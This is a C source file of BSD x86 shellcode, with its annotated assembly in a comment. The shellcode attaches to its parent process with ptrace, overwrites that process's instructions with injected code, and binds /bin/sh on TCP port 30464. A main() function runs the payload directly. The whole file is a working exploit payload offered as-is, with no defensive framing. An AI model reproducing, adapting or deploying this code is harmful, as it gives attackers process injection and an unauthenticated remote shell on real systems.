/* BSD-x86 291 byte ptrace shellcode by eSDee of Netric (www.netric.org) */ char shellcode[]= "\x31\xc0\xb0\x27\xcd\x80\x89\x45" "\x04\x31\xc0\x31\xd2\x31\xc9\x50" "\x50\xff\x75\x04\xb1\x09\x51\x50" "\xb0\x1a\xcd\x80\x39\xc2\x74\x02" "\xeb\x5f\x31\xc0\x50\x50\x50\xff" "\x75\x04\x50\xb0\x07\xcd\x80\x31" "\xc0\x50\x89\xea\x83\xc2\x08\x89" "\x55\xfc\x52\xff\x75\x04\xb1\x21" "\x51\x50\xb0\x1a\xcd\x80\x8b\x55" "\x28\x89\x55\xf8\x31\xf6\xeb\x37" "\x5e\x31\xc9\x31\xc0\x31\xdb\x8a" "\x1e\x53\x46\xb0\x90\x38\xd8\x74" "\x11\x52\xff\x75\x04\xb1\x04\x51" "\x50\xb0\x1a\xcd\x80\x31\xc0\x42" "\xeb\xdf\x31\xc0\x50\x50\xff\x75" "\x04\xb1\x0a\x51\x50\xb0\x1a\xcd" "\x80\x31\xc0\xb0\x01\xcd\x80\xe8" "\xc4\xff\xff\xff" /* bindcode starts here */ "\x31\xc0\x31\xdb" "\x31\xc9\x31\xd2\xb0\x61\x51\xb1" "\x06\x51\xb1\x01\x51\xb1\x02\x51" "\x8d\x0c\x24\x51\xcd\x80\xb1\x02" "\x31\xc9\x51\x51\x51\x80\xc1\x77" "\x66\x51\xb5\x02\x66\x51\x8d\x0c" "\x24\xb2\x10\x52\x51\x50\x8d\x0c" "\x24\x51\x89\xc2\x31\xc0\xb0\x68" "\xcd\x80\xb3\x01\x53\x52\x8d\x0c" "\x24\x51\x31\xc0\xb0\x6a\xcd\x80" "\x31\xc0\x50\x50\x52\x8d\x0c\x24" "\x51\x31\xc9\xb0\x1e\xcd\x80\x89" "\xc3\x53\x51\x31\xc0\xb0\x5a\xcd" "\x80\x41\x53\x51\x31\xc0\xb0\x5a" "\xcd\x80\x41\x53\x51\x31\xc0\xb0" "\x5a\xcd\x80\x31\xdb\x53\x68\x6e" "\x2f\x73\x68\x68\x2f\x2f\x62\x69" "\x89\xe3\x31\xc0\x50\x54\x53\x50" "\xb0\x3b\xcd\x80\x31\xc0\xb0\x01" "\xcd\x80" "\x90"; /* and a NOP to end */ int main() { /* __asm( "xorl %eax,%eax movb $0x27,%al # SYS_getppid int $0x80 movl %eax,4(%ebp) xorl %eax,%eax xorl %edx,%edx xorl %ecx,%ecx pushl %eax pushl %eax pushl 4(%ebp) # getppid movb $0x9, %cl # PT_ATTACH pushl %ecx pushl %eax movb $0x1A,%al # SYS_ptrace int $0x80 # ptrace(PT_ATTACH,getppid(),NULL,NULL); cmp %eax,%edx je PTRACE_WAIT jmp EXIT # failed PTRACE_WAIT: xorl %eax,%eax pushl %eax pushl %eax pushl %eax pushl 4(%ebp) # getppid pushl %eax movb $0x07,%al # SYS_wait4 int $0x80 xorl %eax,%eax pushl %eax movl %ebp,%edx addb $8, %edx movl %edx, -4(%ebp) pushl %edx pushl 4(%ebp) # getppid movb $0x21,%cl # PT_GETREGS pushl %ecx pushl %eax movb $0x1A,%al # SYS_ptrace int $0x80 # ptrace(PT_GETREGS,getppid(),®s,NULL); movl 40(%ebp), %edx movl %edx, -8(%ebp) xorl %esi,%esi jmp GETEIP BACK: popl %esi PTRACE_WRITE: xorl %ecx,%ecx xorl %eax,%eax xorl %ebx,%ebx movb (%esi), %ebx pushl %ebx inc %esi movb $0x90, %al cmpb %bl, %al # end of the shellcode je PTRACE_DETACH pushl %edx pushl 4(%ebp) # getppid movb $0x4,%cl pushl %ecx pushl %eax movb $0x1A,%al # SYS_ptrace int $0x80 # ptrace(PT_WRITE_I,getppid(),eip++,getchar); xorl %eax,%eax inc %edx jmp PTRACE_WRITE PTRACE_DETACH: xorl %eax,%eax pushl %eax pushl %eax pushl 4(%ebp) # getppid movb $0xA, %cl pushl %ecx # PT_DETACH pushl %eax movb $0x1A,%al # SYS_ptrace int $0x80 # ptrace(PT_DETACH,getppid(),NULL,NULL); EXIT: xorl %eax,%eax movb $0x01, %al # SYS_exit int $0x80 GETEIP: call BACK SHELLCODE: # shellcode by r00tdude (ilja@netric.org) xorl %eax,%eax # binds /bin/sh on port 30464 xorl %ebx,%ebx xorl %ecx,%ecx xorl %edx,%edx movb $0x61,%al pushl %ecx movb $0x6,%cl pushl %ecx movb $0x1,%cl pushl %ecx movb $0x2,%cl pushl %ecx leal (%esp),%ecx pushl %ecx int $0x80 movb $0x2,%cl xorl %ecx,%ecx pushl %ecx pushl %ecx pushl %ecx addb $0x77,%cl pushw %cx movb $0x2,%ch pushw %cx leal (%esp),%ecx movb $0x10,%dl pushl %edx pushl %ecx pushl %eax leal (%esp),%ecx pushl %ecx movl %eax,%edx xorl %eax,%eax movb $0x68,%al int $0x80 movb $0x1,%bl pushl %ebx pushl %edx leal (%esp),%ecx pushl %ecx xorl %eax,%eax movb $0x6a,%al int $0x80 xorl %eax,%eax pushl %eax pushl %eax pushl %edx leal (%esp),%ecx pushl %ecx xorl %ecx,%ecx movb $0x1e,%al int $0x80 movl %eax,%ebx pushl %ebx pushl %ecx xorl %eax,%eax movb $0x5a,%al int $0x80 inc %ecx pushl %ebx pushl %ecx xorl %eax,%eax movb $0x5a,%al int $0x80 inc %ecx pushl %ebx pushl %ecx xorl %eax,%eax movb $0x5a,%al int $0x80 xorl %ebx,%ebx pushl %ebx pushl $0x68732f6e pushl $0x69622f2f movl %esp,%ebx xorl %eax,%eax pushl %eax pushl %esp pushl %ebx pushl %eax movb $0x3b,%al int $0x80 xorl %eax,%eax movb $0x1,%al int $0x80 nop"); */ void (*funct)(); (long) funct = &shellcode; printf("Length: %d\n", strlen(shellcode)); funct(); }